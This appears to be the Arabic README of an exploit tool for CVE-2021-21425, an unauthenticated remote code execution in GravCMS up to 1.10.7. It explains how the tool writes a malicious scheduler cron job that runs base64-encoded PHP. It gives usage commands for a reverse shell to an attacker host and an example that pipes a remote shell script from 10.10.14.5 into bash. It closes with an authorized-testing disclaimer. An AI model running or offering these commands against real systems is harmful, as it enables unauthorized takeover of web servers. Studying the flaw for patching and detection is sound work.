
CVE-2021-21425 - GravCMS 1.10.7 ثغرة RCE غير مصادق عليها عبر المجدول. استغلال محسّن مع وسائط CLI وترميز base64 تلقائي.
ثغرة تنفيذ أوامر عن بعد غير مصادق عليها لـ GravCMS <= 1.10.7 عبر كتابة YAML عشوائية إلى المجدول.
هذه نسخة محسّنة من EDB-49973. يتطلب الاستغلال الأصلي تحريرًا يدويًا للقيم المضمنة في النص. هذه النسخة تضيف وسائط سطر أوامر مناسبة وتشفير تلقائي لـ base64 للحمولات.
التحسينات عن الأصل:
-c)| الحقل | القيمة |
|---|---|
| CVE | CVE-2021-21425 |
| EDB-ID | 49973 |
| المتأثر | GravCMS <= 1.10.7 |
| النوع | Unauthenticated RCE |
| CVSS | 9.8 (حرجة) |
يفشل إضافة Grav Admin في التحقق من المصادقة على بعض المسارات الإدارية، مما يسمح للمستخدمين غير المصادق عليهم بكتابة إعدادات YAML عشوائية. يستغل هذا الاستغلال إعدادات المجدول لإنشاء مهمة cron تنفذ كود PHP عشوائي.
# صدفة عكسية
python3 exploit.py -t http://target -s <LHOST> <LPORT>
# أمر مخصص
python3 exploit.py -t http://target -c "id"
# الحصول على صدفة عكسية على الهدف
python3 exploit.py -t http://10.10.10.5 -s 10.10.14.5 4444
# تنفيذ أمر
python3 exploit.py -t http://grav.local:8080 -c "curl http://10.10.14.5/shell.sh | bash"
pip install requests
/admin لاستخراج رمز admin-nonce (لا حاجة للمصادقة بسبب الثغرة)/admin/config/scheduler مع إعداد مهمة cron خبيثة/usr/bin/php -r eval(base64_decode(...))/tmp/rev.sh وينفذهاتعمل مهمة cron كل دقيقة (* * * * *)، لذا تصل الصدفة خلال 60 ثانية.
للاستخدام في الاختبارات الأمنية المصرح بها فقط. تأكد من الحصول على إذن كتابي قبل الاختبار على أي نظام.